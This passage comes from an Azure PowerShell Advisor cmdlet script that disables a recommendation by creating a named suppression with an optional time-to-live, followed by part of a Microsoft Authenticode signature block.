[Microsoft.Azure.PowerShell.Cmdlets.Advisor.Category('Path')] [System.String] ${ResourceId}, [Parameter(ParameterSetName='NameParameterSet', Mandatory, HelpMessage='ResourceName of the recommendation.')] [Microsoft.Azure.PowerShell.Cmdlets.Advisor.Category('Path')] [System.String] ${RecommendationName}, [Parameter(ParameterSetName='InputObjectParameterSet', Mandatory, ValueFromPipeline, HelpMessage='The powershell object type PsAzureAdvisorResourceRecommendationBase returned by Get-AzAdvisorRecommendation call.')] [Microsoft.Azure.PowerShell.Cmdlets.Advisor.Category('Path')] [Microsoft.Azure.PowerShell.Cmdlets.Advisor.Models.IAdvisorIdentity] ${InputObject}, [Parameter(ParameterSetName='InputObjectParameterSet', HelpMessage="Days to disable.")] [Parameter(ParameterSetName='IdParameterSet', HelpMessage="Days to disable.")] [Parameter(ParameterSetName='NameParameterSet', HelpMessage="Days to disable.")] ${Day}, [Parameter(ParameterSetName='InputObjectParameterSet')] [Parameter(ParameterSetName='IdParameterSet')] [Parameter(ParameterSetName='NameParameterSet')] [Microsoft.Azure.PowerShell.Cmdlets.Advisor.Category('Path')] [Microsoft.Azure.PowerShell.Cmdlets.Advisor.Runtime.DefaultInfo(Script='(Get-AzContext).Subscription.Id')] [System.String[]] # The Azure subscription ID. ${SubscriptionId}, [Parameter()] [Alias('AzureRMContext', 'AzureCredential')] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Advisor.Category('Azure')] [System.Management.Automation.PSObject] # The credentials, account, tenant, and subscription used for communication with Azure. ${DefaultProfile}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Advisor.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Wait for .NET debugger to attach ${Break}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Advisor.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.Advisor.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be appended to the front of the pipeline ${HttpPipelineAppend}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Advisor.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.Advisor.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be prepended to the front of the pipeline ${HttpPipelinePrepend}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Advisor.Category('Runtime')] [System.Uri] # The URI for the proxy server to use ${Proxy}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Advisor.Category('Runtime')] [System.Management.Automation.PSCredential] # Credentials for a proxy server to use for the remote call ${ProxyCredential}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Advisor.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Use the default credentials for the proxy ${ProxyUseDefaultCredentials} ) process{ $DefaultSuppressionName = "HardcodedSuppressionName" if ($PSBoundParameters.ContainsKey("RecommendationName")) { $null = $PSBoundParameters.Remove("RecommendationName") } if ($PSBoundParameters.ContainsKey("ResourceId")) { $null = $PSBoundParameters.Remove("ResourceId") } if ($PSBoundParameters.ContainsKey("InputObject")) { $null = $PSBoundParameters.Remove("InputObject") } if ($PSBoundParameters.ContainsKey("Day")) { $null = $PSBoundParameters.Remove("Day") } if ($PSBoundParameters.ContainsKey("SubscriptionId")) { $null = $PSBoundParameters.Remove("SubscriptionId") } switch ($PSCmdlet.ParameterSetName) { 'NameParameterSet' { $ResourceUri = "subscriptions/" + $SubscriptionId $Recommendation= Az.Advisor.internal\Get-AzAdvisorRecommendation -ResourceUri $ResourceUri -Id $RecommendationName @PSBoundParameters $ResourceId = $Recommendation.Id break } 'InputObjectParameterSet' { $ResourceId = $InputObject.Id break } } if ($ResourceId.Contains("providers/Microsoft.Advisor")){ $EndIndex = $ResourceId.IndexOf("providers/Microsoft.Advisor") - 2 $ResourceUri= $ResourceId.Substring(1, $EndIndex) } $ResourceIdSplit = $ResourceId.Split('/') if ($ResourceIdSplit[$ResourceIdSplit.Length - 2].Equals("recommendations")) { $RecommendationId = $ResourceIdSplit[$ResourceIdSplit.Length - 1] } if (!$Day) {$Ttl = ""} else {$Ttl = (New-Timespan -Days $Day).ToString("dd\:hh\:mm\:ss")} Az.Advisor.internal\New-AzAdvisorSuppression -Name $DefaultSuppressionName -RecommendationId $RecommendationId -ResourceUri $ResourceUri -Ttl $Ttl @PSBoundParameters } } # SIG # Begin signature block # MIInzgYJKoZIhvcNAQcCoIInvzCCJ7sCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCD+hG0J5zpiixi1 # hygqfYX7Xr+aK2MDfvhaixjOCxmD1KCCDYUwggYDMIID66ADAgECAhMzAAADri01 # UchTj1UdAAAAAAOuMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwODU5WhcNMjQxMTE0MTkwODU5WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQD0IPymNjfDEKg+YyE6SjDvJwKW1+pieqTjAY0CnOHZ1Nj5irGjNZPMlQ4HfxXG # yAVCZcEWE4x2sZgam872R1s0+TAelOtbqFmoW4suJHAYoTHhkznNVKpscm5fZ899 # QnReZv5WtWwbD8HAFXbPPStW2JKCqPcZ54Y6wbuWV9bKtKPImqbkMcTejTgEAj82 # 6GQc6/Th66Koka8cUIvz59e/IP04DGrh9wkq2jIFvQ8EDegw1B4KyJTIs76+hmpV # M5SwBZjRs3liOQrierkNVo11WuujB3kBf2CbPoP9MlOyyezqkMIbTRj4OHeKlamd # WaSFhwHLJRIQpfc8sLwOSIBBAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUhx/vdKmXhwc4WiWXbsf0I53h8T8w # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMTgzNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AGrJYDUS7s8o0yNprGXRXuAnRcHKxSjFmW4wclcUTYsQZkhnbMwthWM6cAYb/h2W # 5GNKtlmj/y/CThe3y/o0EH2h+jwfU/9eJ0fK1ZO/2WD0xi777qU+a7l8KjMPdwjY # 0tk9bYEGEZfYPRHy1AGPQVuZlG4i5ymJDsMrcIcqV8pxzsw/yk/O4y/nlOjHz4oV # APU0br5t9tgD8E08GSDi3I6H57Ftod9w26h0MlQiOr10Xqhr5iPLS7SlQwj8HW37 # ybqsmjQpKhmWul6xiXSNGGm36GarHy4Q1egYlxhlUnk3ZKSr3QtWIo1GGL03hT57 # xzjL25fKiZQX/q+II8nuG5M0Qmjvl6Egltr4hZ3e3FQRzRHfLoNPq3ELpxbWdH8t # Nuj0j/x9Crnfwbki8n57mJKI5JVWRWTSLmbTcDDLkTZlJLg9V1BIJwXGY3i2kR9i # 5HsADL8YlW0gMWVSlKB1eiSlK6LmFi0rVH16dde+j5T/EaQtFz6qngN7d1lvO7uk # 6rtX+MLKG4LDRsQgBTi6sIYiKntMjoYFHMPvI/OMUip5ljtLitVbkFGfagSqmbxK # 7rJMhC8wiTzHanBg1Rrbff1niBbnFbbV4UDmYumjs1FIpFCazk6AADXxoKCo5TsO # zSHqr9gHgGYQC2hMyX9MGLIpowYCURx3L7kUiGbOiMwaMIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAOuLTVRyFOPVR0AAAAA # A64wDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIPvm # LVs31zQ2hgYkRMkdOKuQQpeehOfPy60c5cuwhMlUMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEA3ByOV2ZVOrkXt7ob7nTzJ+znQiuHRsoSgZ2q # P466Sh9Vh31ik+S7s29Ai5+ETOIvR/X8CHVIpM8O6t1OtfjyD/n1zWN4vpJuWA2+ # SobdE5VnQucWWeGomuuCCkD9BxE4Nctr3E01gWRXVDIno4NdPESf/uuEwTIPQMbZ # mab9OoblGGyCm2buxsPCoeUHF1v10bE2XWyNJLLFW3mrl25dFQrJHAtpAC9rsbn6 # wQzDx+9J8OyX5MYngAr7SNaRfN9b5VWHrGPhZPpD0Oe2iwrR4U1uLmRHYUnSrYny # gRnqGmMgV90V6Z1xLTi+jmbDlfpLhS+7lhmq9FSfYrrD2U1hj6GCFykwghclBgor # BgEEAYI3AwMBMYIXFTCCFxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFZBgsqhkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCAcrR1/rLoTmsexPdygb4subkRNMf0I45nx # 71pt96f0GQIGZiAsyECoGBMyMDI0MDQyMzEzMTUyMS43NDhaMASAAgH0oIHYpIHV # MIHSMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsT # HVRoYWxlcyBUU1MgRVNOOkQwODItNEJGRC1FRUJBMSUwIwYDVQQDExxNaWNyb3Nv # ZnQgVGltZS1TdGFtcCBTZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHcweCM # wl9YXo4AAQAAAdwwDQYJKoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAg # UENBIDIwMTAwHhcNMjMxMDEyMTkwNzA2WhcNMjUwMTEwMTkwNzA2WjCB0jELMAkG # A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQx # HjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9z # b2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMg # VFNTIEVTTjpEMDgyLTRCRkQtRUVCQTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUt # U3RhbXAgU2VydmljZTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIvI # syA1sjg9kSKJzelrUWF5ShqYWL83amn3SE5JyIVPUC7F6qTcLphhHZ9idf21f0Ra # GrU8EHydF8NxPMR2KVNiAtCGPJa8kV1CGvn3beGB2m2ltmqJanG71mAywrkKATYn # iwKLPQLJ00EkXw5TSwfmJXbdgQLFlHyfA5Kg+pUsJXzqumkIvEr0DXPvptAGqkdF # LKwo4BTlEgnvzeTfXukzX8vQtTALfVJuTUgRU7zoP/RFWt3WagahZ6UloI0FC8Xl # BQDVDX5JeMEsx7jgJDdEnK44Y8gHuEWRDq+SG9Xo0GIOjiuTWD5uv3vlEmIAyR/7 # rSFvcLnwAqMdqcy/iqQPMlDOcd0AbniP8ia1BQEUnfZT3UxyK9rLB/SRiKPyHDlg # 8oWwXyiv3+bGB6dmdM61ur6nUtfDf51lPcKhK4Vo83pOE1/niWlVnEHQV9NJ5/Db # USqW2RqTUa2O2KuvsyRGMEgjGJA12/SqrRqlvE2fiN5ZmZVtqSPWaIasx7a0GB+f # dTw+geRn6Mo2S6+/bZEwS/0IJ5gcKGinNbfyQ1xrvWXPtXzKOfjkh75iRuXourGV # PRqkmz5UYz+R5ybMJWj+mfcGqz2hXV8iZnCZDBrrnZivnErCMh5Flfg8496pT0ph # jUTH2GChHIvE4SDSk2hwWP/uHB9gEs8p/9Pe/mt9AgMBAAGjggFJMIIBRTAdBgNV # HQ4EFgQU6HPSBd0OfEX3uNWsdkSraUGe3dswHwYDVR0jBBgwFoAUn6cVXQBeYl2D # 9OXSZacbUzUZ6XIwXwYDVR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3Nv # ZnQuY29tL3BraW9wcy9jcmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3JsMGwGCCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1l # LVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUB # Af8EDDAKBggrBgEFBQcDCDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQAD # ggIBANnrb8Ewr8eX/H1sKt3rnwTDx4AqgHbkMNQo+kUGwCINXS3y1GUcdqsK/R1g # 6Tf7tNx1q0NpKk1JTupUJfHdExKtkuhHA+82lT7yISp/Y74dqJ03RCT4Q+8ooQXT # MzxiewfErVLt8WefebncST0i6ypKv87pCYkxM24bbqbM/V+M5VBppCUs7R+cETiz # /zEA1AbZL/viXtHmryA0CGd+Pt9c+adsYfm7qe5UMnS0f/YJmEEMkEqGXCzyLK+d # h+UsFi0d4lkdcE+Zq5JNjIHesX1wztGVAtvX0DYDZdN2WZ1kk+hOMblUV/L8n1YW # zhP/5XQnYl03AfXErn+1Eatylifzd3ChJ1xuGG76YbWgiRXnDvCiwDqvUJevVRY1 # qy4y4vlVKaShtbdfgPyGeeJ/YcSBONOc0DNTWbjMbL50qeIEC0lHSpL2rRYNVu3h # sHzG8n5u5CQajPwx9PzpsZIeFTNHyVF6kujI4Vo9NvO/zF8Ot44IMj4M7UX9Za4Q # wGf5B71x57OjaX53gxT4vzoHvEBXF9qCmHRgXBLbRomJfDn60alzv7dpCVQIuQ06 # 2nyIZKnsXxzuKFb0TjXWw6OFpG1bsjXpOo5DMHkysribxHor4Yz5dZjVyHANyKo0 # bSrAlVeihcaG5F74SZT8FtyHAW6IgLc5w/3D+R1obDhKZ21WMIIHcTCCBVmgAwIB # AgITMwAAABXF52ueAptJmQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UE # BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc # BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0 # IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1 # WhcNMzAwOTMwMTgzMjI1WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu # Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv # cmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O # 1YLT/e6cBwfSqWxOdcjKNVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZn # hUYjDLWNE893MsAQGOhgfWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t # 1w/YJlN8OWECesSq/XJprx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxq # D89d9P6OU8/W7IVWTe/dvI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmP # frVUj9z6BVWYbWg7mka97aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSW # rAFKu75xqRdbZ2De+JKRHh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv # 231fgLrbqn427DZM9ituqBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zb # r17C89XYcz1DTsEzOUyOArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYcten # IPDC+hIK12NvDMk2ZItboKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQc # xWv2XFJRXRLbJbqvUAV6bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17a # j54WcmnGrnu3tz5q4i6tAgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQAB # MCMGCSsGAQQBgjcVAgQWBBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQU # n6cVXQBeYl2D9OXSZacbUzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEw # QTA/BggrBgEFBQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9E # b2NzL1JlcG9zaXRvcnkuaHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQB # gjcUAgQMHgoAUwB1AGIAQwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/ # MB8GA1UdIwQYMBaAFNX2VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJ # oEeGRWh0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01p # Y1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYB # BQUHMAKGPmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9v # Q2VyQXV0XzIwMTAtMDYtMjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3h # LB9nATEkW+Geckv8qW/qXBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x # 5MKP+2zRoZQYIu7pZmc6U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74p # y27YP0h1AdkY3m2CDPVtI1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1A # oL8ZthISEV09J+BAljis9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbC # HcNhcy4sa3tuPywJeBTpkbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB # 9s7GdP32THJvEKt1MMU0sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNt # yo4JvbMBV0lUZNlz138eW0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3 # rsjoiV5PndLQTHa1V1QJsWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcV # v7TOPqUxUYS8vwLBgqJ7Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A24 # 5oyZ1uEi6vAnQj0llOZ0dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lw # Y1NNje6CbaUFEMFxBmoQtB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB # 0jELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl # ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMk # TWljcm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1U # aGFsZXMgVFNTIEVTTjpEMDgyLTRCRkQtRUVCQTElMCMGA1UEAxMcTWljcm9zb2Z0 # IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUAHDn/cz+3yRkIUCJf # SbL3djnQEqaggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu # Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv # cmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAN # BgkqhkiG9w0BAQUFAAIFAOnRQkowIhgPMjAyNDA0MjMwNDA4NDJaGA8yMDI0MDQy # NDA0MDg0MlowdDA6BgorBgEEAYRZCgQBMSwwKjAKAgUA6dFCSgIBADAHAgEAAgIU # TDAHAgEAAgISBDAKAgUA6dKTygIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEE # AYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GB # AKdfQ6krn/9XKU8Iy031XFlG85OEXSoh4dBGaqeGlD943dkMdlPnjE+MNokMWYaQ # 0JNKwtpMkAnPoDcyylCPCELlR54i9KaOR7WJp72VKtL04H/EbopdGU86A523FLhA # dtVx7+UUaWwr/s7KcbHaSrCmgPUrOzaTxyDnHHkwJ3OWMYIEDTCCBAkCAQEwgZMw # fDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl # ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMd # TWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAHcweCMwl9YXo4AAQAA # AdwwDQYJYIZIAWUDBAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRAB # BDAvBgkqhkiG9w0BCQQxIgQgUf2qxoIiRhJZR+K0lrng3SNPi8V2Amo4/VTAuFKl # jHowgfoGCyqGSIb3DQEJEAIvMYHqMIHnMIHkMIG9BCBTpxeKatlEP4y8qZzjuWL0 # Ou0IqxELDhX2TLylxIINNzCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # ZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBD # QSAyMDEwAhMzAAAB3MHgjMJfWF6OAAEAAAHcMCIEIMlj5Czdui1+yXOeEgNyO7aq # td0QRMsB+0i74NsgRz7zMA0GCSqGSIb3DQEBCwUABIICAD+40gbayPgTSyK6pckZ # fpET0CkI9NKXuRN1v+GICl7oXD4arwih/nUBBtb9DUS9WzR+hObQAa227M4uMSLW # 